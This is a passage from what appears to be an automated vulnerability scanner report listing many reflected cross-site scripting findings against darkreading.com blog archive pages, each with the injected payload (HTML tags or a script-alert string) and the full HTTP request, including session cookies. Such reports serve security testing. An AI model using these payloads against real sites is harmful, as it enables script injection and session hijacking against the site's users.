This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009b18af"><a>e49760590fc/07/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c354c"><a>175fb79daf6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009/07c354c"><a>175fb79daf6/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2009%2F07c354c%22%3E%3Ca%3E175fb79daf6%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2009/07c354c"><a>175fb79daf6/index.html"> ...[SNIP]...
3.358. http://www.darkreading.com/blog/archives/2009/07/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2009/07/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 784b8"><script>alert(1)</script>239cc57a97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2009/07/index.html?784b8"><script>alert(1)</script>239cc57a97=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6306c"><a>2ede6b99be3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/20096306c"><a>2ede6b99be3/08/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f4c"><a>51ce412cf5c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009/0882f4c"><a>51ce412cf5c/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2009%2F0882f4c%22%3E%3Ca%3E51ce412cf5c%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2009/0882f4c"><a>51ce412cf5c/index.html"> ...[SNIP]...
3.361. http://www.darkreading.com/blog/archives/2009/08/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2009/08/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72a2f"><script>alert(1)</script>9fd35845f95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2009/08/index.html?72a2f"><script>alert(1)</script>9fd35845f95=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25a64"><a>3cc7fda8deb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/200925a64"><a>3cc7fda8deb/09/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3836"><a>6ae147884b0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009/09d3836"><a>6ae147884b0/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2009%2F09d3836%22%3E%3Ca%3E6ae147884b0%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2009/09d3836"><a>6ae147884b0/index.html"> ...[SNIP]...
3.364. http://www.darkreading.com/blog/archives/2009/09/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2009/09/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dbda"><script>alert(1)</script>b5f60d1ad01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2009/09/index.html?7dbda"><script>alert(1)</script>b5f60d1ad01=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bb6c"><a>73282eaed25 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/20092bb6c"><a>73282eaed25/10/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a820f"><a>dfec57011e5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009/10a820f"><a>dfec57011e5/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2009%2F10a820f%22%3E%3Ca%3Edfec57011e5%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2009/10a820f"><a>dfec57011e5/index.html"> ...[SNIP]...
3.367. http://www.darkreading.com/blog/archives/2009/10/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2009/10/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 250c0"><script>alert(1)</script>d317e3f751a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2009/10/index.html?250c0"><script>alert(1)</script>d317e3f751a=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc42f"><a>721b5667a63 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009cc42f"><a>721b5667a63/11/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8df01"><a>50ab033e38d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009/118df01"><a>50ab033e38d/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2009%2F118df01%22%3E%3Ca%3E50ab033e38d%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2009/118df01"><a>50ab033e38d/index.html"> ...[SNIP]...
3.370. http://www.darkreading.com/blog/archives/2009/11/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2009/11/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6929a"><script>alert(1)</script>7208389ef75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2009/11/index.html?6929a"><script>alert(1)</script>7208389ef75=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dc42"><a>403c8fbebb2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/20099dc42"><a>403c8fbebb2/12/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75026"><a>e15ef152169 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009/1275026"><a>e15ef152169/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2009%2F1275026%22%3E%3Ca%3Ee15ef152169%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2009/1275026"><a>e15ef152169/index.html"> ...[SNIP]...
3.373. http://www.darkreading.com/blog/archives/2009/12/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2009/12/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38ede"><script>alert(1)</script>c750fd6dd4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2009/12/index.html?38ede"><script>alert(1)</script>c750fd6dd4b=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdbb6"><a>9420fdb854e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2010cdbb6"><a>9420fdb854e/01/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... ogin?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2010cdbb6%22%3E%3Ca%3E9420fdb854e%2F01%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2010cdbb6"><a>9420fdb854e/01/index.html"> ...[SNIP]...
3.375. http://www.darkreading.com/blog/archives/2010/01/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2010/01/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b052e"><script>alert(1)</script>f1e0e274828 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2010/01/index.html?b052e"><script>alert(1)</script>f1e0e274828=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98e6f"><a>28d57e52fcb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/201098e6f"><a>28d57e52fcb/02/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... ogin?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F201098e6f%22%3E%3Ca%3E28d57e52fcb%2F02%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/201098e6f"><a>28d57e52fcb/02/index.html"> ...[SNIP]...
3.377. http://www.darkreading.com/blog/archives/2010/02/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2010/02/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66c98"><script>alert(1)</script>3087b58a38d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2010/02/index.html?66c98"><script>alert(1)</script>3087b58a38d=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ccff"><a>fb2a6948865 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/20107ccff"><a>fb2a6948865/03/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... ogin?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F20107ccff%22%3E%3Ca%3Efb2a6948865%2F03%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/20107ccff"><a>fb2a6948865/03/index.html"> ...[SNIP]...
3.379. http://www.darkreading.com/blog/archives/2010/03/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2010/03/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94d46"><script>alert(1)</script>1197fb0045b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2010/03/index.html?94d46"><script>alert(1)</script>1197fb0045b=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47199"><a>6d2389917ad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/201047199"><a>6d2389917ad/04/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... ogin?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F201047199%22%3E%3Ca%3E6d2389917ad%2F04%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/201047199"><a>6d2389917ad/04/index.html"> ...[SNIP]...
3.381. http://www.darkreading.com/blog/archives/2010/04/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2010/04/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91a4d"><script>alert(1)</script>b008b21fd28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
